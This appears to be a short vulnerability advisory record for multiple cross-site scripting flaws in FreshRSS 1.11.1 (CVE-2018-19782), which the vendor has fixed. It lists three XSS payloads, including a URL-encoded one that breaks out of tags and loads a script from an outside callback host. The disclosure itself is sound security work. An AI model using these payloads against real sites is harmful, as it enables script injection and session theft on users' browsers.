vendor:
FreshRSS
by:
Netsparker Security Team
6.1
CVSS
MEDIUM
Cross-site Scripting
79
CWE
Product Name: FreshRSS
Affected Version From: 1.11.1
Affected Version To: 1.11.1
Patch Exists: YES
Related CWE: CVE-2018-19782
CPE: a:freshrss:freshrss:1.11.1
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: None
2018
Multiple Cross-Site Scripting Vulnerabilities in FreshRSS 1.11.1
Multiple Cross-Site Scripting vulnerabilities were discovered in FreshRSS 1.11.1. Blind Cross-site Scripting, Stored Cross-site Scripting, and Cross-site Scripting vulnerabilities were identified. Attack patterns included %27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt+src%3d%22%2f%2f4cipl0hyi5btaxbj3ovzc7b6e6eckgescau78dxgsho%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e, '"--></style></scRipt><scRipt>netsparker(0x00139F)</scRipt> and %3ciMg+src%3dN+onerror%3dnetsparker(0x001DCF)%3e.
Mitigation:
Vendor Fixed